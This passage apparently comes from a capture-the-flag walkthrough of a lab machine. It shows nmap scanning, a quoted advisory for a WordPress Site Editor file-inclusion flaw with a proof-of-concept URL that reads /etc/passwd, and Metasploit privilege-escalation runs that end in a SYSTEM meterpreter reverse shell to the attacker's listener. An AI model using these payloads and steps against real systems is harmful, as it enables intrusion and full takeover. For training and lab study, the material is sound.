3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.010 seconds (127.36 hosts/sec). 3 responded ┌──(root㉿kali)-[~] └─# nmap -A 192.168.56.113 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 04:56 EST Nmap scan report for 192.168.56.113 Host is up (0.00038s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 8080/tcp open http Apache httpd |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache |_http-title: Did not follow redirect to http://tripladvisor:8080/wordpress/ MAC Address: 08:00:27:6B:61:B0 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: phone Running: Microsoft Windows Phone OS CPE: cpe:/o:microsoft:windows OS details: Microsoft Windows Phone 7.5 or 8.0 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 0.38 ms 192.168.56.113
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 73.05 seconds
** CVE description ** A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
** Technical details ** In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.
By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
** Proof of Concept ** http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
** Solution ** No fix available yet.
** Timeline ** 03/01/2018: author contacted through siteeditor.org’s contact form; no reply 16/01/2018: issue report filled on the public GitHub page with no technical details 18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us “another” e-mail 19/01/2018: report sent; author says he will fix this issue “very soon” 31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply 14/02/2018: WP Plugins team contacted; no reply 06/03/2018: vendor contacted; no reply 07/03/2018: vendor contacted; no reply 15/03/2018: public disclosure
** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).
– Best Regards,
Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI)
Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION falseyes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.113 - Collecting local exploits for x64/windows... [*] 192.168.56.113 - 198 exploit checks are being tried... [+] 192.168.56.113 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable. [+] 192.168.56.113 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 192.168.56.113 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable. [+] 192.168.56.113 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! [+] 192.168.56.113 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable. [+] 192.168.56.113 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected! [+] 192.168.56.113 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 192.168.56.113 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 192.168.56.113 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [+] 192.168.56.113 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 192.168.56.113 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [*] Running check method for exploit 47 / 47 [*] 192.168.56.113 - Valid modules for session 1: ============================
# Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable. 2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable. 3 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable. 4 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! 5 exploit/windows/local/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable. 6 exploit/windows/local/cve_2021_40449 Yes The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected! 7 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable. 8 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable. 9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated. 10 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable. 11 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable. 12 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable. 13 exploit/windows/local/always_install_elevated No The target is not exploitable. 14 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable. 15 exploit/windows/local/bypassuac_dotnet_profiler No The target is not exploitable. 16 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable. 17 exploit/windows/local/bypassuac_sdclt No The target is not exploitable. 18 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable. 19 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found 20 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability. 21 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable. 22 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable. 23 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable. 24 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable. 25 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version! 26 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable. 27 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable. 28 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot. 29 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable. 30 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2 31 exploit/windows/local/cve_2023_28252_clfs_driver No The target is not exploitable. The target system does not have clfs.sys in system32\drivers\ 32 exploit/windows/local/cve_2024_30088_authz_basep No The target is not exploitable. Version detected: Windows 2008 R2 33 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found 34 exploit/windows/local/ikeext_service No The check raised an exception. 35 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store 36 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable 37 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability. 38 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable. 39 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception. 40 exploit/windows/local/nvidia_nvsvc No The check raised an exception. 41 exploit/windows/local/panda_psevents No The target is not exploitable. 42 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found 43 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012. 44 exploit/windows/local/tokenmagic No The target is not exploitable. 45 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable. 46 exploit/windows/local/webexec No The check raised an exception. 47 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
[*] Post module execution completed msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_comhijack [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_comhijack) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.160.100 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_comhijack) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(windows/local/bypassuac_comhijack) > set session 1 session => 1 msf6 exploit(windows/local/bypassuac_comhijack) > run
[*] Started reverse TCP handler on 192.168.56.102:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [-] Exploit aborted due to failure: bad-config: x86 payload selected for x64 system [*] Exploit completed, but no session was created. msf6 exploit(windows/local/bypassuac_comhijack) > use exploit/windows/local/bypassuac_eventvwr [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_eventvwr) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.160.100 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1 session => 1 msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 192.168.56.102:4444 [-] Exploit aborted due to failure: no-target: Session and Target arch must match [*] Exploit completed, but no session was created. msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/cve_2019_1458_wizardopium [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.160.100 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows 7 x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set session 1 session => 1 msf6 exploit(windows/local/cve_2019_1458_wizardopium) > run
[*] Started reverse TCP handler on 192.168.56.102:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Triggering the exploit... [*] Launching msiexec to host the DLL... [+] Process 264 launched. [*] Reflectively injecting the DLL into 264... [*] Sending stage (203846 bytes) to 192.168.56.113 [+] Exploit finished, waitfor (hopefully privileged) payload execution to complete. [*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.113:49571) at 2024-12-25 05:58:20 -0500
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
